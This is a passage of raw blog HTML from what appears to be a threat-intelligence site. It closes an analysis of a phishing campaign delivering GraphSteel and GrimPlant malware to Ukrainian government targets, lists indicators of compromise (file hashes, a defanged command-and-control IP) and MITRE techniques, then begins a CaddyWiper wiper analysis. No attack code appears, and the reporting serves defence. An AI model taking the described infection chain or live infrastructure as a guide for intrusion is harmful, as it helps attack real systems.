src="https://lh4.googleusercontent.com/rW2mrMZrwE-EdBdo3Hta8gWioVpXpfzvAoC0WV0s5VImQlrLIaFpbaJZrvBkwqoF_0PHehLxrcUeInJo6oqTrYW9n61qmFITYm8JFlRHluYTskEYFkZlSloSWPvGECe9XmtX3t7H" style="margin-left: 0px; margin-top: 0px;" width="247" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">This executable establishes a connection to the remote servers and starts downloading <i>GraphSteel </i>and <i>GrimPlant </i>malware.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 281px; overflow: hidden; width: 624px;"><img height="281" src="https://lh5.googleusercontent.com/GUsAojnzB449UBy3885orIQkaEehqCf0fcsRkfT4LaLiUOws0Ja7TjClUcYIf1Ksy1CCcRU9utKrvcMG-hakkhkbAPyqXwRxEACMIQdM4L18Wt8Zzt5_hquiSVD8kf9kg6zyqNZ_" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 167px; overflow: hidden; width: 624px;"><img height="167" src="https://lh5.googleusercontent.com/WlNgVkL5-F7-qnLejY5v9WMLrxBg6SopcU2qroDt510CzQ7p7rU62KJCaJPugK1YV6H-_G6BXZV2ZyNutHfqmAjnUFz1gO-j-p3VjDN4Fj3iXDopcULTZfpq3azYRy2er2nqpGE3" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 164px; overflow: hidden; width: 624px;"><img height="164" src="https://lh4.googleusercontent.com/Cp71Jxh0DsDriSzDRFaVnnrNbAt4gyDLzwh37KeeEGl0j2HA4Ho1wcKm5uoekM3A1hzORp-OarHRw6gNmr2MPO_tUxsNvhsQX2ZzqsV2X_S2j_bLOCI2mugpDZalj7r-0WQWtdoq" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 143px; overflow: hidden; width: 624px;"><img height="143" src="https://lh4.googleusercontent.com/UGKftzwrvgB2KqJodYDfnd0276yskR5bXIaJBrwkc-jGnpweQJyC0YeY3qMRWRxCr_JovHcJ1kkzcUUxp-FLCccUEcDYJpj9qM8AFC0eyucY8vMjGM09nvXQ7y5wkKgMKB4clxMg" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><br /><br /><h2 dir="ltr" style="line-height: 1.3800000000000001; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Conclusion</span></h2><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The Ukrainian government has become a major target since Russia invaded Ukraine. This time malicious software comes via email attachments with the ‘.xls’ file. This file contains the VisualBasic script, which was copied from the website with open-source VB scripts. The borrowed script decodes the payload (PE64) saved inside the workbook. The dropped file downloads the trojan-downloader that downloads two more files: GraphSteel and GrimPlant malware.</span></p><br /><h2 dir="ltr" style="line-height: 1.3800000000000001; margin-bottom: 6pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">IoCs </span></h2><h3 dir="ltr" style="line-height: 1.3800000000000001; margin-bottom: 4pt; margin-top: 16pt;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Files</span></h3><br /><div align="left" dir="ltr" style="margin-left: 3pt;"><table style="border-collapse: collapse; border: none;"><colgroup><col width="83"></col><col width="431"></col><col width="119"></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">File name</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">SHA256</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Description</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Заборгованість по зарплаті.xls</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">c1afb561cd5363ac5826ce7a72f0055b400b86bd7524da43474c94bc480d7eff</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Email attachment</span></p></td></tr><tr style="height: 25.998046875pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Base-Update.exe</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">9e9fa8b3b0a59762b429853a36674608df1fa7d7f7140c8fccd7c1946070995a</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">GoDownloader</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">java-sdk.exe</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">8ffe7f2eeb0cbfbe158b77bbff3e0055d2ef7138f481b4fac8ade6bfb9b2b0a1</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">GoDownloader</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">oracle-java.exe</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">99a2b79a4231806d4979aa017ff7e8b804d32bfe9dcc0958d403dfe06bdd0532</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">GrimPlant</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">microsoft-cortana.exe</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">c83d8b36402639ea3f1ad5d48edc1a22005923aee1c1826afabe27cb3989baa3</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">GraphSteel</span></p></td></tr></tbody></table></div><br /><h3 dir="ltr" style="line-height: 1.3800000000000001; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Network indicators</span></h3><br /><div align="left" dir="ltr" style="margin-left: 3pt;"><table style="border-collapse: collapse; border: none;"><colgroup><col width="644"></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">IP</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https://194[.]31.98.124:443/i</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https://194[.]31.98.124:443/p</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https://194[.]31.98.124:443/m</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">ws://194[.]31.98.124:443/c</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">194[.]31.98.124</span></p></td></tr></tbody></table></div><br /><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><h3 dir="ltr" style="line-height: 1.3800000000000001; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">MITRE attack techniques</span></h3><br /><div align="left" dir="ltr" style="margin-left: 0.75pt;"><table style="border-collapse: collapse; border: none;"><colgroup><col width="149"></col><col width="499"></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Tactic</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">Technique</span></p></td></tr><tr style="height: 23.09912109375pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Initial Access</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1566/001/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1566.001 – Phishing: Spearphishing Attachment</span></a></p></td></tr><tr style="height: 23.09912109375pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Execution</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1204/002/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1204.002 – User Execution: Malicious File</span></a></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1059/005/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1059.005 – Command and Scripting Interpreter: Visual Basic</span></a></p></td></tr><tr style="height: 23.25pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Command and Control</span></p></td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://attack.mitre.org/techniques/T1568/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 9pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">T1568 – Dynamic Resolution</span></a></p></td></tr></tbody></table></div><br /><br /><h2 dir="ltr" style="line-height: 1.3800000000000001; margin-bottom: 6pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">References</span></h2><ol style="margin-bottom: 0; margin-top: 0; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.3800000000000001; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://cert.gov.ua/article/38374" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">https://cert.gov.ua/article/38374</span></a><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> </span></p></li><li aria-level="1" dir="ltr" style="font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: decimal; vertical-align: baseline;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 14.6667px; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: Arial;"><a href="https://blog.malwarebytes.com/threat-intelligence/2022/04/new-uac-0056-activity-theres-a-go-elephant-in-the-room/">https://blog.malwarebytes.com/threat-intelligence/2022/04/new-uac-0056-activity-theres-a-go-elephant-in-the-room/</a> </span></span></p></li></ol><span><!--more--></span><span><!--more--></span>Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-8119716373843929802022-03-17T23:22:00.001-07:002022-03-19T02:54:03.912-07:00Analysis of CaddyWiper<p> <img height="192" src="https://lh4.googleusercontent.com/3jtKmbVfUbbPZAIsgO9pLw6figip-s9a4hN9zz-jvXOBfcauKce0Lr1PTBKNRfxnT4tZkBkP57nv_dIdBCTWkuXQg6cttAU2D3Vt1VA3uwBk2xIUn-uxLQ7L4VltV6bPYnI2r-l9" style="background-color: white; color: #141519; font-family: Arial; font-size: 14.6667px; margin-left: 0px; margin-top: 0px; text-align: center; white-space: pre-wrap;" width="533" /></p><span id="docs-internal-guid-38a7aac9-7fff-3750-9d24-f457d71c5e2f"><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Summary</span></h2><br /><ul style="margin-bottom: 0px; margin-top: 0px; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Name: CaddyWiper</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Discovered in March 2022</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Was used in a targeted attack in Ukraine</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Deployed via Microsoft Active Directory GPO</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Corrupts files and disk partitions</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">PE32 sample written in C++</span></p></li><li aria-level="1" dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; list-style-type: disc; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Compiled on the same day when it was deployed on targeted systems in Ukraine</span></p></li></ul><div style="text-align: right;"><span style="font-family: Arial;"><span style="font-size: 14.6667px; white-space: pre-wrap;"><i>by Denis Popov</i></span></span></div><div style="text-align: justify;"><span style="font-family: Arial;"><span><a name='more'></a></span></span></div><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt; text-align: justify;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Introduction</span></h2><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: white; color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: 